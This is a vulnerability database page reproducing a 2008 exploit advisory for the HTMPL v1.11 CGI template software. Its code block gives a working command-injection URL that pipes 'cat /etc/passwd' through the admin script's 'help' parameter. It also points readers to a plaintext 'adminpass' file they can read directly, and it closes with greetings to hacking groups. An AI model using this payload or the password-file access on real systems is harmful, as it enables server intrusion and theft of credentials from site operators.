Lucene search

K

HTMPL 1.11 Code Execution

🗓️ 10 Dec 2008 00:00:00Reported by ZeNType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 12 Views

HTMPL v1.11 Code Execution vulnerability, severity: High, exploit to execute commands and access plaintext admin password

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Software : HTMPL v1.11  
Download Link : http://vmeste.org/templ_ex/doc/1.html  
Vulnrability : Command Execution  
Severity : High  
Author : ZeN  
Website : http://dusecurity.com / http://darkcode.me/  
  
Exploit :  
site.com/cgi-bin/htmpl_admin.cgi?help=|cat /etc/passwd  
  
  
A few other little..... tricks  
The admins password is kept plaintext in the file 'adminpass', you can just access it directly  
in the same directory.  
  
Thanks str0ke ;)  
  
Shouts to :  
DU Security Group  
DarkCoders  
WL-Group  
Milw0rm  
EnigmaGroup  
IWannaHack  
HackHound  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo